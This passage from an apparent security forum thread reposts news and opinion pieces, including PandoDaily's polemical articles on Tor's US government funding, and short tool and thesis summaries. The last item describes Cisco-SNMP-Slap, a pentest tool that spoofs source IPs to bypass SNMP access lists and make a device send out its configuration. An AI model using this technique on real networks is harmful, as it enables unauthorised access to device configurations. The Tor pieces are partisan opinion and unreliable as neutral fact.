people, should know better. Her employer, EFF, is one of the biggest promotors of Tor. It was also an early financial sponsor, and was instrumental in helping Tor transition from a US Navy project to an “independent” organization back in 2004. EFF even shares two corporate funders with Tor: Google and the Omidyar Network. Even more importantly: Jillian York sits on the advisory council of Radio Free Asia’s “Open Technology Fund,” the federal government entity and a major backer of Tor that also funds LARB book reviewer Harry Halrin’s company. Morgan Marquis-Boire, the First Look Media techie who called me a conspiracy theorist for investigating Tor’s funding, is another prime example. Marquis-Boire is listed as a “special advisor” to EFF; he’s also a longtime researcher at Toronto-based Citizen Lab, a forensic tech outfit backed by Google, Ford Foundation, George Soros’ Open Society Institute, Palantir and Canada’s version of USAID. Citizen Lab is also a close partner of Radio Free Asia’s “Open Technology Fund.” Before taking his current job with Omidyar, he was on Google’s payroll. Then there’s ACLU’s Christopher Soghoian, who compared my Tor reporting to deadly anti-Semitic propaganda. Soghoian has been dubbed the “Ralph Nader for the Internet Age” by Wired, but it’s a curious analogy. Nader’s fame came from fighting corporate power and greed; but Soghoian has spent his entire career sucking from the corporate teat, indiscriminately moving from one oligarch’s foundation to another: graduate school scholarship from Google in 2006/2007; the Koch brothers’ Institute for Humane Studies, chaired by Charles Koch himself, in 2008/2009; fellowship at Harvard’s Berkman Center for Internet & Society, an outfit funded by the State Department, USAID, Soros, Google, Omidyar, and so on; Soros Open Society fellowship in 2011/2012; TEDGlobal Fellow in 2012, funded in part by Amazon billionaire Jeff Bezos; and most recently, a fellowship at Yale Law School’s Information Society Project, which is funded by Google, Ford Foundation, Soros, Microsoft and many many more. Not surprisingly, Soghoian’s policy work on privacy and encryption argues that markets are the solution to online privacy and surveillance problems, not laws, regulations or politics. In a recent paper published in the Harvard Journal of Law and Technology—which was co-authored with a former-prosecutor-turned-lobbyist—Soghoian argued that encryption technology, not regulations, was the only thing that could effectively protect Americans from surveillance: “communications of Americans will only be secured through the use of privacy enhancing technologies like encryption, not with regulations prohibiting the use or sale of interception technology.” No wonder all these people are so upset by my reporting. They’ve branded themselves as radical activists fighting The Man and the corporate surveillance apparatus—while taking money from the US government’s military and foreign policy arms, as well as the biggest and worst corporate violators of our privacy. By branding themselves as radical activists, they appear to share the same interests as the grassroots they seek to influence; exposing their funding conflicts-of-interests makes it hard for them to pose as grassroots radicals. So instead of explaining why getting funding from the very entitities that Tor is supposed to protect users from is not a problem, they’ve taken the low road to discredit the very idea of reporting on monetary conflicts-of-interests as either irrelevant, or worse, a sign of mental illness. Who would’ve thought that many of the people we’ve entrusted with protecting our online privacy have the same values as sleazy K Street lobbyists. Sursa: How leading Tor developers and advocates tried to smear me after I reported their US Government ties | PandoDaily
  10. Almost everyone involved in developing Tor was (or is) funded by the US government By Yasha Levine On July 16, 2014 “The United States government can’t simply run an anonymity system for everybody and then use it themselves only. Because then every time a connection came from it people would say, “Oh, it’s another CIA agent.” If those are the only people using the network.” —Roger Dingledine, co-founder of the Tor Network, 2004 *** In early July, hacker Jacob Appelbaum and two other security experts published a blockbuster story in conjunction with the German press. They had obtained leaked top secret NSA documents and source code showing that the surveillance agency had targeted and potentially penetrated the Tor Network, a widely used privacy tool considered to be the holy grail of online anonymity. Internet privacy activists and organizations reacted to the news with shock. For the past decade, they had been promoting Tor as a scrappy but extremely effective grassroots technology that can protect journalists, dissidents and whistleblowers from powerful government forces that want to track their every move online. It was supposed to be the best tool out there. Tor’s been an integral part of EFF’s “Surveillance Self-Defense” privacy toolkit. Edward Snowden is apparently a big fan, and so is Glenn Greenwald, who says it “allows people to surf without governments or secret services being able to monitor them.” But the German exposé showed Tor providing the opposite of anonymity: it singled out users for total NSA surveillance, potentially sucking up and recording everything they did online. To many in the privacy community, the NSA’s attack on Tor was tantamount to high treason: a fascist violation of a fundamental and sacred human right to privacy and free speech. The Electronic Frontier Foundation believes Tor to be “essential to freedom of expression.” Appelbaum — a Wikileaks volunteer and Tor developer — considers volunteering for Tor to be a valiant act on par with “going to Spain to fight the Franco fascists” on the side of anarchist revolutionaries. It’s a nice story, pitting scrappy techno-anarchists against the all-powerful US Imperial machine. But the facts about Tor are not as clear cut or simple as these folks make them out to be… Let’s start with the basics: Tor was developed, built and financed by the US military-surveillance complex. Tor’s original — and current — purpose is to cloak the online identity of government agents and informants while they are in the field: gathering intelligence, setting up sting operations, giving human intelligence assets a way to report back to their handlers — that kind of thing. This information is out there, but it’s not very well known, and it’s certainly not emphasized by those who promote it. Peek under Tor’s hood, and you quickly realize that just everybody involved in developing Tor technology has been and/or still is funded by the Pentagon or related arm of the US empire. That includes Roger Dingledine, who brought the technology to life under a series of military and federal government contracts. Dingledine even spent a summer working at the NSA. If you read the fine print on Tor’s website, you’ll see that Tor is still very much in active use by the US government: “A branch of the U.S. Navy uses Tor for open source intelligence gathering, and one of its teams used Tor while deployed in the Middle East recently. Law enforcement uses Tor for visiting or surveilling web sites without leaving government IP addresses in their web logs, and for security during sting operations.” NSA? DoD? U.S. Navy? Police surveillance? What the hell is going on? How is it possible that a privacy tool was created by the same military and intelligence agencies that it’s supposed to guard us against? Is it a ruse? A sham? A honeytrap? Maybe I’m just being too paranoid… Unfortunately, this is not a tinfoil hat conspiracy theory. It is cold hard fact. Brief history of Tor The origins of Tor go back to 1995, when military scientists at the Naval Research Laboratory began developing cloaking technology that would prevent someone’s activity on the Internet from being traced back to them. They called it “onion routing” — a method redirecting traffic into a parallel peer-to-peer network and bouncing it around randomly before sending it off to its final destination. The idea was to move it around so as to confuse and disconnect its origin and destination, and make it impossible for someone to observe who you are or where you’re going on the Internet. Onion routing was like a hustler playing the three-card monte with your traffic: the guy trying to spy on you could watch it going under one card, but he never knew where it would come out. The technology was funded by the Office of Naval Research and DARPA. Early development was spearheaded by Paul Syverson, Michael Reed and David Goldschlag — all military mathematicians and computer systems researchers working for the Naval Research Laboratory, sitting inside the massive Joint Base Anacostia-Bolling military base in Southeast Washington, D.C. The original goal of onion routing wasn’t to protect privacy — or at least not in the way most people think of “privacy.” The goal was to allow intelligence and military personnel to work online undercover without fear of being unmasked by someone monitoring their Internet activity. “As military grade communication devices increasingly depend on the public communications infrastructure, it is important to use that infrastructure in ways that are resistant to traffic analysis. It may also be useful to communicate anonymously, for example when gathering intelligence from public databases,” explained a 1997 paper outlining an early version of onion routing that was published in the Naval Research Labs Review. In the 90s, as public Internet use and infrastructure grew and multiplied, spooks needed to figure out a way to hide their identity in plain sight online. An undercover spook sitting in a hotel room in a hostile country somewhere couldn’t simply dial up CIA.gov on his browser and log in — anyone sniffing his connection would know who he was. Nor could a military intel agent infiltrate a potential terrorist group masquerading as an online animal rights forum if he had to create an account and log in from an army base IP address. That’s where onion routing came in. As Michael Reed, one of the inventors of onion routing, explained: providing cover for military and intelligence operations online was their primary objective; everything else was secondary: The original *QUESTION* posed that led to the invention of Onion Routing was, “Can we build a system that allows for bi-directional communications over the Internet where the source and destination cannot be determined by a mid-point?” The *PURPOSE* was for DoD / Intelligence usage (open source intelligence gathering, covering of forward deployed assets, whatever). Not helping dissidents in repressive countries. Not assisting criminals in covering their electronic tracks. Not helping bit-torrent users avoid MPAA/RIAA prosecution. Not giving a 10 year old a way to bypass an anti-porn filter. Of course, we knew those would be other unavoidable uses for the technology, but that was immaterial to the problem at hand we were trying to solve (and if those uses were going to give us more cover traffic to better hide what we wanted to use the network for, all the better…I once told a flag officer that much to his chagrin). Apparently solving this problem wasn’t very easy. Onion router research progressed slowly, with several versions developed and discarded. But in 2002, seven years after it began, the project moved into a different and more active phase. Paul Syverson from the Naval Research Laboratory stayed on the project, but two new guys fresh outta MIT grad school came on board: Roger Dingledine and Nick Mathewson. They were not formally employed by Naval Labs, but were on contract from DARPA and the U.S. Naval Research Laboratory’s Center for High Assurance Computer Systems. For the next several years, the three of them worked on a newer version of onion routing that would later become known as Tor. Very early on, researchers understood that just designing a system that only technically anonymizes traffic is not enough — not if the system is used exclusively by military and intelligence. In order to cloak spooks better, Tor needed to be used by a diverse group of people: Activists, students, corporate researchers, soccer moms, journalists, drug dealers, hackers, child pornographers, foreign agents, terrorists — the more diverse the group that spooks could hide in the crowd in plain sight. Tor also needed to be moved off site and disassociated from Naval research. As Syverson told Bloomberg in January 2014: “If you have a system that’s only a Navy system, anything popping out of it is obviously from the Navy. You need to have a network that carries traffic for other people as well.” Dingledine said the same thing a decade earlier at the 2004 Wizards of OS conference in Germany: “The United States government can’t simply run an anonymity system for everybody and then use it themselves only. Because then every time a connection came from it people would say, ‘Oh, it’s another CIA agent.’ If those are the only people using the network.” The consumer version of Tor would be marketed to everyone and — equally important — would eventually allow anyone to run a Tor node/relay, even from their desktop computer. The idea was to create a massive crowdsourced torrent-style network made up from thousands of volunteers all across the world. At the very end of 2004, with Tor technology finally ready for deployment, the US Navy cut most of its Tor funding, released it under an open source license and, oddly, the project was handed over to the Electronic Frontier Foundation. “We funded Roger Dingledine and Nick Mathewson to work on Tor for a single year from November 2004 through October 2005 for $180,000. We then served as a fiscal sponsor for the project until they got their 501©(3) status over the next year or two. During that time, we took in less than $50,000 for the project,” EFF’s Dave Maass told me by email. In a December 2004 press release announcing its support for Tor, EFF curiously failed to mention that this anonymity tool was developed primarily for military and intelligence use. Instead, it focused purely on Tor’s ability to protect free speech from oppressive regimes in the Internet age. “The Tor project is a perfect fit for EFF, because one of our primary goals is to protect the privacy and anonymity of Internet users. Tor can help people exercise their First Amendment right to free, anonymous speech online,” said EFF’s Technology Manager Chris Palmer. Later on, EFF’s online materials began mentioning that Tor had been developed by the Naval Research Lab, but played down the connection, explaining that it was “in the past.” Meanwhile the organization kept boosting and promoting Tor as a powerful privacy tool: “Your traffic is safer when you use Tor.” Playing down Tor’s ties to the military… The people at EFF weren’t the only ones minimizing Tor’s ties to the military. In 2005, Wired published what might have been the first major profile of Tor technology. The article was written by Kim Zetter, and headlined: “Tor Torches Online Tracking.” Although Zetter was a bit critical of Tor, she made it seem like the anonymity technology had been handed over by the military with no strings attached to “two Boston-based programmers” — Dingledine and Nick Mathewson, who had completely rebuilt the product and ran it independently. Dingledine and Mathewson might have been based in Boston, but they — and Tor — were hardly independent. At the time that the Wired article went to press in 2005, both had been on the Pentagon payroll for at least three years. And they would continue to be on the federal government’s payroll for at least another seven years. In fact, in 2004, at the Wizards of OS conference in Germany, Dingledine proudly announced that he was building spy craft tech on the government payroll: “I forgot to mention earlier something that will make you look at me in a new light. I contract for the United States Government to built anonymity technology for them and deploy it. They don’t think of it as anonymity technology, although we use that term. They think of it as security technology. They need these technologies so they can research people they are interested in, so they can have anonymous tip lines, so that they can buy things from people without other countries knowing what they are buying, how much they are buying and where it is going, that sort of thing.” Government support kept rolling in well after that. In 2006, Tor research was funded was through a no-bid federal contract awarded to Dingledine’s consulting company, Moria Labs. And starting in 2007, the Pentagon cash came directly through the Tor Project itself — thanks to the fact that Team Tor finally left EFF and registered its own independent 501©(3) non-profit. How dependent was — and is — Tor on support from federal government agencies like the Pentagon? In 2007, it appears that all of Tor’s funding came from the federal government via two grants. A quarter million came from the International Broadcasting Bureau (IBB), a CIA spinoff that now operates under the Broadcasting Board of Governors. IBB runs Voice of America and Radio Marti, a propaganda outfit aimed at subverting Cuba’s communist regime. The CIA supposedly cut IBB financing in the 1970s after its ties to Cold War propaganda arms like Radio Free Europe were exposed. The second chunk of cash — just under $100,000 — came from Internews, an NGO aimed at funding and training dissident and activists abroad. Tor’s subsequent tax filings show that grants from Internews were in fact conduits for “pass through” grants from the US State Department. In 2008, Tor got $527,000 again from IBB and Internews, which meant that 90% of its funding came U.S. government sources that year. In 2009, the federal government provided just over $900,000, or about 90% of the funding. Part of that cash came through a $632,189 federal grant from the State Department, described in tax filings as a “Pass-Through from Internews Network International.” Another $270,000 came via the CIA-spinoff IBB. The Swedish government gave $38,000, while Google gave a minuscule $29,000. Most of that government cash went out in the form of salaries to Tor administrators and developers. Tor co-founders Dingledine and Mathewson made $120,000. Jacob Appelbaum, the rock star hacker, Wikileaks volunteer and Tor developer, made $96,000. In 2010, the State Department upped its grant to $913,000 and IBB gave $180,000 — which added up to nearly $1 million out of a total of $1.3 million total funds listed on tax filings that year. Again, a good chunk of that went out as salaries to Tor developers and managers. In 2011, IBB gave $150,00, while another $730,000 came via Pentagon and State Department grants, which represented more than 70% of the grants that year. (Although based on tax filings, government contracts added up to nearly 100% of Tor’s funding.) The DoD grant was passed through the Stanford Research Institute, a cutting edge Cold War military-intel outfit. The Pentagon-SRI grant to Tor was given this description: “Basic and Applied Research and Development in Areas Relating to the Navy Command, Control, Communications, Computers, Intelligence, Surveillance, and Reconnaissance.” That year, a new government funder came the scene: Swedish International Development Cooperation Agency (SIDA), Sweden’s version of USAID, gave Tor $279,000. In 2012, Tor nearly doubled its budget, taking in $2.2 million from Pentagon and intel-connected grants: $876,099 came from the DoD, $353,000 from the State Department, $387,800 from IBB. That same year, Tor lined up an unknown amount funding from the Broadcasting Board of Governors to finance fast exit nodes. Tor at the NSA? In 2013, the Washington Post revealed that the NSA had figured out various ways of unmasking and penetrating the anonymity of the Tor Network. Since 2006, according to a 49-page research paper titled simply “Tor,” the agency has worked on several methods that, if successful, would allow the NSA to uncloak anonymous traffic on a “wide scale” — effectively by watching communications as they enter and exit the Tor system, rather than trying to follow them inside. One type of attack, for example, would identify users by minute differences in the clock times on their computers. The evidence came out of Edward Snowden’s NSA leaks. It appeared that the surveillance agency had developed several techniques to get at Tor. One of the documents explained that the NSA “pretty much guaranteed to succeed.” Snowden’s leaks revealed another interesting detail: In 2007, Dingledine gave at a talk at the NSA’s HQ explaining Tor, and how it worked. The Washington Post published the NSA’s notes from their meeting with Dingledine. They showed that Dingledine and the NSA mostly talked about the technical details of Tor — how the network works and some of its security/usability tradeoffs. The NSA was curious about “Tor’s customers,” and Dingledine ran down some of the types of people who could benefit from Tor: Blogger Alice, 8 yr. old Alice, Sick Alice, Consumer Alice, Oppressed Alice, Business Alice, Law Enforcement Alice… Interestingly, Dingledine told the NSA that “the way TOR is spun is dependent on who the ‘spinee’ is” — meaning that he markets Tor technology in different ways to different people? Interestingly, the Washington Post article described Dingledine’s trip to the NSA as “a wary encounter, akin to mutual intelligence gathering, between a spy agency and a man who built tools to ward off electronic surveillance.” Dingledine told the paper that he came away from that meeting with the feeling that the NSA was trying to hack the Tor network: “As hespoke to the NSA, Dingledine said in an interview Friday, he suspected the agency was attempting to break into Tor, which is used by millions of people around the world to shield their identities.” Dingledine may very well have been antagonistic during his meeting with the NSA. Perhaps he was protective over his Tor baby, and didn’t want its original inventors and sponsors in the US government taking it back. But whatever the reason, the antagonism was not likely borne out of some sort of innate ideological hostility towards the US national security state. Aside from being on the DoD payroll, Dingledine has spends a considerable amount of his time meeting and consulting with military, intelligence and law enforcement agencies to explain why Tor’s so great, and instructing them on how to use it. What kind of agencies does he meet with? The FBI, CIA and DOJ are just a few… And if you listen to Dingledine explain these encounters in some of his public appearances, one does not detect so much as a whiff of antagonism towards intelligence and law enforcement agencies. In 2013, during a talk at UC San Diego, Dingledine cheerfully recalled how an exuberant FBI agent rushed up to thank him during his recent trip to the FBI: “So I’ve been doing a lot of talks lately for law enforcement. And pretty much every talk I do these days, sone FBI person comes up to me afterwards and says, ‘I use Tor everyday for my job. Thank you.’ Another example is anonymous tips — I was talking to the folks who run the CIA anonymous tip line. It’s called the Iraqi Rewards Program…” Dingledine’s close collaboration with law enforcement aside, there’s the strangely glib manner in which he dismissed news about the NSA hacking into Tor. He seemed totally unconcerned by the evidence revealed by Snowden’s leaks, and played down the NSA’s capabilities in his comments to the Washington Post: “If those documents actually represent what they can do, they are not as big an adversary as I thought.” I reached out to Dingledine to ask him about his trip to the NSA and whether he warned the Tor community back in 2007 that he suspected the NSA was targeting Tor users. He didn’t respond. How safe is Tor, really? If Dingledine didn’t appear to be fazed by evidence of the NSA’s attack on Tor anonymity, it’s strange considering that an attack by a powerful government entity has been known to be one Tor’s principle weaknesses for quite some time. In a 2011 discussion on Tor’s official listserv, Tor developer Mike Perry admitted that Tor might not be very effective against powerful, organized “adversaries” (aka governments) that are capable monitoring huge swaths of the Internet. “Extremely well funded adversaries that are able to observe large portions of the Internet can probably break aspects of Tor and may be able to deanonymize users. This is why the core tor program currently has a version number of 0.2.x and comes with a warning that it is not to be used for “strong anonymity”. (Though I personally don’t believe any adversary can reliably deanonymize *all* tor users . . . but attacks on anonymity are subtle and cumulative in nature). Indeed, just last year, Syverson was part of a research team that pretty much proved that Tor can no longer be expected to protect users over the long term. “Tor is known to be insecure against an adversary that can observe a user’s traffic entering and exiting the anonymity network. Quite simple and efficient techniques can correlate traffic at these separate locations by taking advantage of identifying traffic patterns. As a result, the user and his destination may be identified, completely subverting the protocol’s security goals.” The researchers concluded: “These results are somewhat gloomy for the current security of the Tor network.” While Syverson indicated that some of the security issues identified by this research have been addressed in recent Tor versions, the findings only added to a growing list of other research and anecdotal evidence showing Tor’s not as safe as its boosters want you to think — especially when pitted against determined intelligence agencies. Case-in-point: In December 2013, a 20-year-old Harvard panicked overachiever named Edlo Kim learned just how little protection Tor offered for would be terrorists. To avoid taking a final exam he wasn’t prepared for, Kim hit up on the idea of sending in a fake bomb threat. ?? cover his tracks, he used Tor, supposedly the best anonymity service the web had to offer. But it did little mask his identity from a determined Uncle Sam. A joint investigation, which involved the FBI, the Secret Service and local police, was able to track the fake bomb threat right back to Kim — in less than 24 hours. As the FBI complaint explained, “Harvard University was able to determine that, in the several hours leading up to the receipt of the e-mail messages described above, ELDO KIM accessed TOR using Harvard’s wireless network.” All that Tor did was make the cops jump a few extra steps. But it wasn’t hard, nothing that a bit of manpower with full legal authority to access network records couldn’t solve. It helped that Harvard’s network logging all metadata access on the network — sorta like the NSA. Over the past few years, U.S. law enforcement has taken control and shutdown a series of illegal child porn and drug marketplaces operating on what should have been untraceable, hyper-anonymous servers running in the Tor cloud. In 2013, they took down Freedom Hosting, which was accused of being a massive child porn hosting operation — but not before taking control of its servers and intercepting all of its communication with customers. The FBI did the same thing that same year with the online drug superstore Silkroad, which also ran its services in the Tor cloud. Although, rookie mistakes helped FBI unmask the identity of Dred Pirate Roberts, it is still a mystery how they were able to totally take over and control, and even copy, a server run in the Tor cloud — something that is supposed to be impossible. Back in 2007, a Swedish hacker/researcher named Dan Egerstad showed that just by running a Tor node, he could siphon and read all the unencrypted traffic that went through his chunk of the Tor network. He was able to access logins and passwords to accounts of NGOs, companies, and the embassies of India and Iran. Egerstad thought at first that embassy staff were just being careless with their info, but quickly realized that he had actually stumbled on a hack/surveillance operation in which Tor was being used to covertly access these accounts. Although Egerstad was a big fan of Tor and still believes that Tor can provide anonymity if used correctly, the experience made him highly suspicious. He told Sydney Morning Herald that he thinks many of the major Tor nodes are being run by intelligence agencies or other parties interested in listening in on Tor communication. “I don’t like speculating about it, but I’m telling people that it is possible. And if you actually look in to where these Tor nodes are hosted and how big they are, some of these nodes cost thousands of dollars each month just to host because they’re using lots of bandwidth, they’re heavy-duty servers and so on. Who would pay for this and be anonymous? For example, five of six of them are in Washington D.C.…” Tor stinks? Tor supporters point to a cache of NSA documents leaked by Snowden to prove that the agency fears and hates Tor. A 2013 Guardian story based on these docs — written by James Ball, Bruce Schneier and Glenn Greenwald — argues that agency is all but powerless against the anonymity tool. …the documents suggest that the fundamental security of the Torservice remains intact. One top-secret presentation, titled ‘Tor Stinks’, states: “We will never be able to de-anonymize all Tor users all the time.” It continues: “With manual analysis we can de-anonymize a very small fraction of Tor users,” and says the agency has had “no success de-anonymizing a user in response” to a specific request. Another top-secret presentation calls Tor “the king of high-secure, low-latency internet anonymity”. But the NSA docs are far from conclusive and offer conflicting bits of evidence, allowing for multiple interpretations. But the fact is that the NSA and GCHQ clearly have the capability to compromise Tor, but it might take a bit of targeted effort. One thing is clear: the NSA most certainly does not hate or fear Tor. And some aspects about Tor are definitely welcomed by the NSA, in part because it helps concentrate potential “targets” in one convenient location. Tor Stinks… But it Could be Worse • Critical mass of targets use Tor. Scaring them away might be counterproductive. • We can increase our success rate and provide more client IPs for individual Tor users. • We will never get 100% but we don’t need to provide true IPs for every target every time they use Tor. Tor network is not as difficult to capture as it may seem… In 2012, Tor co-founder Roger Dingledine revealed that the Tor Network is configured to prioritize speed and route traffic through through the fastest servers/nodes available. As a result, the vast bulk of Tor traffic runs through several dozen of the fastest and most dependable servers: “on today’s network, clients choose one of the fastest 5 exit relays around 25-30% of the time, and 80% of their choices come from a pool of 40-50 relays.” Dingledine was criticized by Tor community for the obvious reason that funneling traffic through a handful of fast nodes made surveilling and subverting Tor much easier. Anyone can run a Tor node — a research student in Germany, a guy with FIOS connection in Victorville (which is what I did for a few months), an NSA front out of Hawaii or a guy working for China’s Internet Police. There’s no way of knowing if the people running the fastest most stable nodes are doing it out of goodwill or because it’s the best way to listen in and subvert the Tor network. Particularly troubling was that Snowden’s leaks clearly showed the NSA and GCHQ run Tor nodes, and are interested in running more. And running 50 Tor nodes doesn’t seem like it would be too difficult for any of the world’s intelligence agencies — whether American, German, British, Russian, Chinese or Iranian. Hell, if you’re an intelligence agency, there’s no reason not to run a Tor node. Back in 2005, Dingledine admitted to Wired that this was a “tricky design question” but couldn’t provide a good answer to how they’d handle it. In 2012, he dismissed his critics altogether, explaining that he was perfectly willing to sacrifice security for speed — whatever it took to take get more people to use Tor: This choice goes back to the original discussion that Mike Perry and I were wrestling with a few years ago… if we want to end up with a fast safe network, do we get there by having a slow safe network and hoping it’ll get faster, or by having a fast less-safe network and hoping it’ll get safer? We opted for the “if we don’t stay relevant to the world, Tor will never grow enough” route. Speaking of spooks running Tor nodes… If you thought the Tor story couldn’t get any weirder, it can and does. Probably the strangest part of this whole saga is the fact that Edward Snowden ran multiple high-bandwidth Tor nodes while working as an NSA contractor in Hawaii. This only became publicly known last May, when Tor developer Runa Sandvik (who also drew her salary from Pentagon/State Department sources at Tor) told Wired’s Kevin Poulsen that just two weeks before he would try to get in touch with Glenn Greenwald, Snowden emailed her, explaining that he ran a major Tor node and wanted to get some Tor stickers. Stickers? Yes, stickers. Here’s Wired: In his e-mail, Snowden wrote that he personally ran one of the “major tor exits”–a 2 gbps server named “TheSignal”–and was trying to persuade some unnamed coworkers at his office to set up additional servers. He didn’t say where he worked. But he wanted to know if Sandvik could send him a stack of official Tor stickers. (In some post-leak photos of Snowden you can see the Tor sticker on the back of his laptop, next to the EFF sticker). Snowden’s request for Tor stickers turned into something a bit more intimate. Turned out that Sandvik was already planning to go to Hawaii for vacation, so she suggested they meet up to talk about communication security and encryption. She wrote Snowden back and offered to give a presentation about Tor to a local audience. Snowden was enthusiastic and offered to set up a crypto party for the occasion. So the two of them threw a “crypto party” at a local coffee shop in Honolulu, teaching twenty or so locals how to use Tor and encrypt their hard drives. “He introduced himself as Ed. We talked for a bit before everything started. And I remember asking where he worked or what he did, and he didn’t really want to tell,” Sandvik told Wired. But she did learn that Snowden was running more than one Tor exit node, and that he was trying to get some of his buddies at “work”to set up additional Tor nodes… H’mmm….So Snowden running powerful Tor nodes and trying to get his NSA colleagues to run them, too? I reached out to Sandvik for comment. She didn’t reply. But Wired’s Poulsen suggested that running Tor nodes and throwing a crypto party was a pet privacy project for Snowden. “Even as he was thinking globally, he was acting locally.” But it’s hard to imagine a guy with top secret security clearance in the midst of planning to steal a huge cache of secrets would risk running a Tor node to help out the privacy cause. But then, who hell knows what any of this means. I guess it’s fitting that Tor’s logo is an onion — because the more layers you peel and the deeper you get, the less things make sense and the more you realize that there is no end or bottom to it. It’s hard to get any straight answers — or even know what questions you should be asking. In that way, the Tor Project more resembles a spook project than a tool designed by a culture that values accountability or transparency. Sursa: Almost everyone involved in developing Tor was (or is) funded by the US government | PandoDaily
  11. Mastercard and Visa to ERADICATE password authentication By John Leyden, 14 Nov 2014 Mastercard and Visa are removing the need for users to enter their passwords for identity confirmation as part of a revamp of the existing (oft-criticised) 3-D Secure scheme. The arrival of 3D Secure 2.0 next year will see the credit card giants moving away from the existing system of secondary static passwords to authorise online purchases, as applied by Verified by Visa and MasterCard SecureCode, towards a next-gen system based on more secure biometric and token-based prompts. Security experts welcomed the move, which some argue is if anything overdue. Initially authentication codes will be sent to pre-registered mobiles before the longer term goal of placing more emphasis on biometrics. “All of us want a payment experience that is safe as well as simple, not one or the other,” said Ajay Bhalla, president of enterprise security solutions at MasterCard, The Guardian reports. “We want to identify people for who they are, not what they remember. We have too many passwords to remember and this creates extra problems for consumers and businesses.” 3-D Secure is disliked both by security experts, who argue it's easily circumvented by phishing attacks, and merchants, who say the scheme's only benefit is allowing banks to shift liability in the case of fraudulent payments. The long-standing criticism has been that schemes like Verified by Visa inconvenience users without offering increased security. Marta Janus, a security researcher at Kaspersky Lab, welcomed the decision by the credit card giants to move away from static passwords. "It’s pretty well known that passwords are severely flawed: weak ones are easy to remember and easy to guess; strong ones are hard to guess, but hard to remember," Janus said. "So the move from Mastercard and Visa is definitely an interesting one." "It’s a really good approach and, if implemented properly, the new protocol will not only be way more convenient for users, but also much more secure. One time passwords are already widely used and considered much safer than traditional 'fixed' passwords, even if it's still possible for cybercriminals to obtain and use them. But, combined with biometric checks, this will certainly make a strong alternative to any existing authentication method," she concluded. Phil Turner, VP EMEA at enterprise-focused identity management service firm Okta, also welcomed the development as a move towards reducing the number of usernames/passwords consumers are obliged to remember. "Between their work and personal accounts, consumers have a lot of usernames and passwords to remember, each of which has different password requirements and expiration cycles," Turner explained. "Add this to the hassle caused by constant password resets and remembering secret questions and it’s clear consumers need a way to make this process easier. "The move to abolish passwords will no doubt be welcomed by customers. Today we have so many passwords to remember. As a result, most of us suffer from 'password fatigue' where we use obvious or reused passwords often written down on Post-it notes or saved in Excel files on laptops," he added. ® Sursa: Mastercard and Visa to ERADICATE password authentication • The Register
  12. IODIDE - The IOS Debugger and Integrated Disassembler Environment Released as open source by NCC Group Plc - http://www.nccgroup.com/ Developed by Andy Davis, andy dot davis at nccgroup dot com https://github.com/nccgroup/IODIDE Released under AGPL see LICENSE for more information Includes the PowerPC disassembler from cxmon by Christian Bauer, Marc Hellwig (The Official cxmon Home Page) Documentation https://github.com/nccgroup/IODIDE/wiki Pre-requisites Python wxPython pyserial Platforms Tested on Windows 7 Sursa: https://github.com/nccgroup/IODIDE
  13. IDA Skins Plugin providing advanced skinning support for the Qt version of IDA Pro utilizing Qt stylesheets, similar to CSS. Screenshot Screenshot above shows the enclosed stylesheet.css in combination with the idaConsonance theme. Binary distribution Download latest binary version from github Installation Place IDASkins.plX into the plugins directory of your IDA installation. The theme files (the skin directory) needs to be copied to the root of your IDA installation. Theming Theming IDA using IDASkins works using Qt stylesheets. For information on the most important IDA-specific UI elements, take a look in the enclosed default stylesheet.css. Sursa: https://github.com/athre0z/ida-skins
  14. Traffic Analysis Attacks and Defenses in Low Latency Anonymous Communication Sambuddho Chakravarty The recent public disclosure of mass surveillance of electronic communication, involving powerful government authorities, has drawn the public’s attention to issues regarding Internet privacy. For almost a decade now, there have been several research efforts towards designing and deploying open source, trustworthy and reliable systems that ensure users’ anonymity and privacy. These systems operate by hiding the true network identity of communicating parties against eavesdropping adversaries. Tor, acronym for The Onion Router, is an example of such a system. Such systems relay the traffic of their users through an overlay of nodes that are called Onion Routers and are operated by volunteers distributed across the globe. Such systems have served well as anti-censorship and anti-surveillance tools. However, recent publications have disclosed that powerful government organizations are seeking means to de-anonymize such systems and have deployed distributed monitoring infrastructure to aid their efforts. Attacks against anonymous communication systems, like Tor, often involve traffic analysis. In such attacks, an adversary, capable of observing network traffic statistics in several different networks, correlates the traffic patterns in these networks, and associates otherwise seemingly unrelated network connections. The process can lead an adversary to the source of an anonymous connection. However, due to their design, consisting of globally distributed relays, the users of anonymity networks like Tor, can route their traffic virtually via any network; hiding their tracks and true identities from their communication peers and eavesdropping adversaries. De-anonymization of a random anonymous connection is hard, as the adversary is required to correlate traffic patterns in one network link to those in virtually all other networks. Past research mostly involved reducing the complexity of this process by first reducing the set of relays or network routers to monitor, and then identifying the actual source of anonymous traffic among network connections that are routed via this reduced set of relays or network routers to monitor. A study of various research efforts in this field reveals that there have been many more efforts to reduce the set of relays or routers to be searched than to explore methods for actually identifying an anonymous user amidst the network connections using these routers and relays. Few have tried to comprehensively study a complete attack, that involves reducing the set of relays and routers to monitor and identifying the source of an anonymous connection. Although it is believed that systems like Tor are trivially vulnerable to traffic analysis, there are various technical challenges and issues that can become obstacles to accurately identifying the source of anonymous connection. It is hard to adjudge the vulnerability of anonymous communication systems without adequately exploring the issues involved in identifying the source of anonymous traffic. Download: http://cryptome.org/2014/11/sambuddho_thesis.pdf
  15. [h=1]Cisco-SNMP-Slap[/h] OVERVIEW ======== cisco-snmp-slap utilises IP address spoofing in order to bypass an ACL protecting an SNMP service on a Cisco IOS device. Typically IP spoofing has limited use during real attacks outside DoS. Any TCP service cannot complete the inital handshake. UDP packets are easier to spoof but the return packet is often sent to the wrong address, which makes it difficult to collect any information returned. However if an attacker can guess the snmp rw community string and a valid source address an attacker can set SNMP MiBs. One of the more obvious uses for this is to have a Cisco SNMP service send its IOS configuration file to another device. This tool allows you to try one or more community strings against a Cisco device from one or more IP addresses. When specifying IP addresses you can choose to subsequently or randomly go through a range of source addresses. To specifying range of source IP addresses to check an initial source address and IP mask are supplied. Any bits set in the IP mask will be used to generate source IP addresses by altering the initial source address. For example, if a source address of `10.0.0.0` is supplied with a IP mask of 0.0.0.255 then the script will explore the address from `10.0.0.0` to `10.0.0.255`. The bits set do not have to be sequential like a subnet mask. For example the mask 0.128.1.255 is valid and will explore the ranges `10.0,128.0-1.0-255`. When checking a range of IP addresses randomly or sequentially it requires you to enter the path to the root of the tftp directory. The script will check this directory to see if the file has been successfully transferred. This tool was written to target Cisco layer 3 switches during pentests, though it may have other users. It works well against these devices because: 1. layer 3 switches rarely have reverse path verification configured in the author's experience 2. there are no routers or other devices which may be able to detect that IP spoofing is 